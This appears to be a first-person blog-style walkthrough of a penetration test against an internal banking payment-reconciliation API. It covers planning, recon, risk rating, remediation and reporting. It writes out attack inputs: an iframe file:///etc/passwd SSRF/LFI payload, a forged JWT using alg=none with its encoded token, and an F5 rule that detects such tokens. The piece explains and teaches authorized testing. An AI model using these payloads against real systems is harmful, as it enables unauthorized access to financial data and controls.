Pros
- • Demonstrates the complete lifecycle of a high-stakes penetration test in a zero-downtime environment
- • Combines practical exploit commands with strategic risk analysis and decision matrices
- • Illustrates the maturity difference between simply 'running exploits' and acting as a trusted security advisor
- • Provides deep insight into how technical flaws (like JWT and TLS configs) translate directly into financial liability
- • Showcases collaborative red-blue team dynamics and expert reporting methodologies including remediation code
Cons
- • Assumes advanced knowledge of application architecture, authentication, and cryptography
- • Limits focus purely to logical attack paths rather than generic automated scanning
- • Requires understanding of compliance mandates (PCI-DSS, GLBA) to fully grasp the risk logic
Operating offensively within a Tier-1 financial institution fundamentally alters your methodology. In a standard assessment, taking down a QA server might warrant an apology. In banking, triggering a denial-of-service on a SWIFT gateway or interrupting an overnight batch-processing queue is an immediate termination event with potential regulatory fallout.
This is the anatomy of a real, restricted-scope enterprise banking penetration test. It highlights both the practical technical commands used to exploit the infrastructure, and the operational mindset required when operating under zero-tolerance constraints.
1. Engagement Planning: Analyzing the blast radius
The mandate is a targeted assessment of a newly developed internal payment reconciliation API. It’s a gray-box test, conducted remotely through a hardened VDI jumpbox. I know the SIEM is watching. I know the IDS is active.
Before a single packet is sent, the most critical phase occurs: defining the Rules of Engagement (RoE). In banking, assuming a staging environment is “safe” is the most dangerous assumption an operator can make. Legacy mainframes and upstream vendor APIs are frequently hardcoded across DEV, UAT, and PROD.
My analysis starts with the Architecture Diagram. I am explicitly identifying the data flows connecting this new API to the legacy Core Banking System.
- Why? If I discover a SQL payload that cascades out of the API and accidentally locks a production mainframe database table during overnight processing, I have caused a disruption. The constraints change my approach from aggressive fault injection to surgical, measured data-payload testing.
2. Target Understanding: Mapping the Business Logic
I am not just looking for open standard ports; I am looking for business logic. The application is a RESTful API meant to reconcile intra-day ledger discrepancies.
I ignore the load balancers and WAF initially. I need to understand what this API actually does.
- Where does authentication happen?
- Is authorization handled via JWT, an external Identity Provider (Okta), or legacy session state?
- Does changing an account parameter trigger an automated batch file generation, or is it a direct database query?
Understanding the business process dictates exactly where the highest value vulnerabilities live. A generic Cross-Site Scripting (XSS) finding is irrelevant here. I am hunting for Insecure Direct Object References (IDOR) and authorization bypasses that allow unauthorized ledger modifications.
3. Initial Access Strategy
Because this is a specific web application scope within the internal network, my path isn’t a traditional external-to-internal pivot. My initial access strategy is purely unauthenticated API endpoint enumeration against the internal gateway.
The Trade-off: Speed versus WAF correlation.
If I fuzz the API aggressively with ffuf running 1,000 threads, the internal F5 load balancer will detect high 404 rates and the SOC will severe my VDI connection. I must prioritize. I focus first on the authentication endpoints.
- Why? If I can bypass the auth mechanism entirely, the rest of the WAF filters usually implicitly trust the authenticated session.
I use Burp Suite’s Intruder set to a slow, randomized baseline (1 request every 3 seconds) just to map the application tree.
4. Recon & Enumeration: Decision-Based Probing
I discover a reporting endpoint via manual flow mapping:
GET /api/v1/reports/generate?report_type=summary&format=pdf HTTP/1.1
Host: internal-recon.bank.local
Authorization: Bearer <low_priv_token>
Most automated tools will see report_type and flag “Potential parameter tampering.” But as an operator, I see a format=pdf flag. Backend PDF generation libraries typically run headless browsers (like Puppeteer) or utilize legacy binaries like wkhtmltopdf.
My next step isn’t just to fuzz the parameter; it’s to intentionally inject HTML/JS payloads designed specifically to test for Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI).
I modify the parameter practically:
GET /api/v1/reports/generate?report_type=<iframe src="file:///etc/passwd"></iframe>&format=pdf
I’m hoping the back-end PDF generator will render the host’s /etc/passwd file into the downloaded PDF, or allow me to hit the AWS Metadata endpoint (http://169.254.169.254/latest/meta-data/).
5. Vulnerability Identification: The Real Thinking
During the reconnaissance, I find two distinct issues:
- The Noise: The API server responds with a detailed
Server: Apache/2.4.41banner. - The Vulnerability: The API uses a JWT for session state, but the token lacks an expiration claim (
exp). Even worse, the server is misconfigured to accept unsigned tokens.
Automated scanners will flag the Server banner as a Medium risk “Information Disclosure.” In an enterprise banking environment behind three layers of reverse proxies, that finding is purely theoretical noise. I ignore it.
The JWT misconfiguration is the real vulnerability.
Original Extracted JWT Header & Payload (Decoded):
// Header
{"alg": "RS256", "typ": "JWT"}
// Payload
{"user": "jdoe", "role": "readonly_analyst", "iat": 1712610000}
6. Exploit Development Mindset
I intercept the API call in Burp Suite. I modify the payload to escalate my privileges from readonly_analyst to reconciliation_admin. Because I do not possess the server’s RSA private key to legitimately sign the token, I alter the header to force the algorithm to none.
Forged JWT:
// Forged Header
{"alg": "none", "typ": "JWT"}
// Forged Payload
{"user": "jdoe", "role": "reconciliation_admin", "iat": 1712610000}
// Signature: (Removed entirely)
I base64-url encode this structure:
eyJhbGciOiAibm9uZSIsICJ0eXAiOiAiSldUIn0.eyJ1c2VyIjogImpkb2UiLCAicm9
sZSI6ICJyZWNvbmNpbGlhdGlvbl9hZG1pbiIsICJpYXQiOiAxNzEyNjEwMDAwfQ.
The Stop Condition: I inject this token and attempt to access the <bank>/api/v1/admin/users endpoint. It returns an HTTP 200 OK with a full list of system administrators. I now have administrative read access.
Do I attempt to delete a user or modify a production ledger to “prove” the impact? Absolutely not.
In a banking environment, proving exploitation stops the moment the critical risk is validated logically. Modifying data crosses the line from assessment to disruption. I securely log the HTTP 200 response and immediately cease exploitation.
7. Cryptography & Protocol Analysis
Simultaneously, during infrastructure mapping, I intercept the internal service-to-service communication using sslyze to audit the cryptography:
sslyze --regular internal-db-mq.bank.local:5671
The output confirms the middleware API communicates with the backend RabbitMQ message broker using TLS 1.0 and weak CBC ciphers (TLS_RSA_WITH_AES_128_CBC_SHA).
Why does this matter internally? Corporate environments operate on an “assume breach” model. Threat actors who breach the perimeter via phishing will passively sniff internal traffic. In a financial institution, weak internal cryptography allows lateral adversaries to harvest plaintext credentials or payment PANs traversing the internal wire via padding oracle attacks. It is an immediate compliance violation (PCI-DSS Requirements 4.1).
8. The Critical Decision Point
I now have three distinct findings:
- Weak TLS 1.0 on internal message queues.
- An exposed PDF generation endpoint (Blind SSRF).
- JWT Authentication Algorithm bypass (Authz Bypass).
Prioritization: The JWT Auth bypass takes extreme priority. Why? The SSRF requires complex exploitation and is neutered by internal egress filtering. Weak TLS requires an attacker to already have a highly privileged network sniffing position. The JWT bypass, however, requires exactly zero prerequisites. Any standard user on the internal network can instantly forge a token and achieve administrative control over the payment reconciliation system with a simple proxy intercept.
9. Risk Rating (The Consultant’s Reality)
I absolutely do not copy-paste CVSS scores. A base CVSS lacks business context.
- Technical Severity: High (Complete Authentication Bypass).
- Business Impact: Critical. This API reconciles mismatched payment batches. An attacker with admin rights could theoretically suppress reconciliation alerts on fraudulent outgoing SWIFT transfers.
- Exploitability: High (Requires no specialized tooling, only a tampered HTTP header).
My Final Rating: CRITICAL. Even though the application is strictly internal (lowering the initial technical threat model), the resulting business impact on financial integrity overrides the network location.
10. Mitigation Strategy: Playing the Advisor
Telling a bank to “Fix the JWT library” is useless. They have deployment freezes, heavy ITIL processes, and vendor dependencies. My advisory approach provides immediate, actionable code.
Short-Term (Next 24 Hours): Implement a strict WAF rule on the internal F5 load balancer (iRule) that drops any HTTP request containing a JWT header attempting to bypass signature validation.
when HTTP_REQUEST {
if { [HTTP::header exists "Authorization"] } {
set auth_header [HTTP::header "Authorization"]
if { $auth_header contains "eyJhbGciOiAibm9uZS" } {
# Drop alg=none tokens
HTTP::respond 401 content "Unauthorized - Invalid Token Algorithm"
return
}
}
}
Medium-Term (Next Sprint): Update the heavily outdated backend authentication framework. Enforce mandatory cryptographically secure signature validation (RS256 or HS256) on all API verifications explicitly in the application code.
Long-Term (Architecture): Migrate away from stateless JWTs for critical high-value financial API access. Move to stateful, heavily audited OAuth2 / OIDC session tokens where termination can be rapidly enforced by the central IdP.
11. Reporting for Impact
A junior penetration tester writes reports grouped by technical vulnerability. An expert consultant writes reports grouped by attack narrative and business risk.
The Executive Summary is written purely for the CISO. It does not mention “JWT” or “alg:none”. It states: “Due to a critical flaw in session validation, any internal employee or compromised workstation can unilaterally authorize payment reconciliations without oversight. This violates separation-of-duties compliance and exposes the institution to unchecked insider wire fraud.”
The technical breakdown is written for the Lead Architect. It provides the exact Base64 strings, the exact line of the proposed F5 iRule, and the precise reproduction syntax.
12. Collaboration with Central Teams
During the read-out, the DevOps team argues that the JWT flaw isn’t Critical because “the API is only accessible from the internal corporate VPN segment.”
This is where the consultant proves their worth. I don’t argue the CVSS metrics. I argue the threat model. “The corporate VPN segment has 12,000 users. If a single user from HR clicks a phishing link and their laptop is compromised by an initial access broker, the attacker now shares that same VPN segment. Internal isolation is not a compensating control for broken core authentication on a financial application.” The finding remains Critical.
13. Continuous Security Improvement
The value of this assessment isn’t just finding the JWT flaw; it is identifying why the JWT flaw made it to production.
The advisory notes that the CI/CD pipeline lacks dynamic application security testing (DAST) for authentication mechanics. The true organizational maturity comes when the bank updates their pipeline to automatically fail any pull request that permits weak signing algorithms, permanently eliminating this entire class of vulnerability across the enterprise.
14. When Things Go Wrong
During the assessment, my SSRF payload attempts against the PDF generator suddenly start timing out. My VDI drops. The Blue Team (SOC) detected the rapid succession of anomalous internal payloads (file:///etc/passwd) and severed my access.
I do not hide this in the report. I celebrate it. As an offensive operator, my goal is also to validate defensive capability. I document the exact timestamp of my detection. I highlight that while the application was vulnerable, the SOC’s internal honeypot alerting worked flawlessly, preventing sustained exploitation. This validates their SIEM investment and proves the value of defense-in-depth.
15. Attacker vs. Defender Perspective
Everything I just mapped out is exactly how a sophisticated Ransomware-as-a-Service (RaaS) affiliate operates once inside an enterprise.
The Attacker: Will use the JWT bypass to map high-value financial routing paths silently, establish persistence, and attempt to exfiltrate the dataset before deploying the encryptor payload. The Defender: Must realize that endpoint agents (EDR/AV) will not catch this. A forged JWT is a valid HTTP request traveling over port 443. Defense here relies entirely on identity analytics, strict access logging, and WAF protocol enforcement.
16. The Difference Between Pentesting and Offensive Security
A standard penetration tester runs automated tools, identifies technical misconfigurations, and hands over a spreadsheet of CVEs.
An Offensive Security Consultant understands that they are simulating a business risk. They understand that a vulnerability only matters precisely to the extent that it threatens the organization’s mission, capital, or reputation. In a Tier-1 banking environment, the ability to rapidly identify high-impact logical flaws, safely execute the practical exploit payload without causing an outage, and eloquently guide executive leadership through the remediation process is what ultimately separates the operators from the scanners.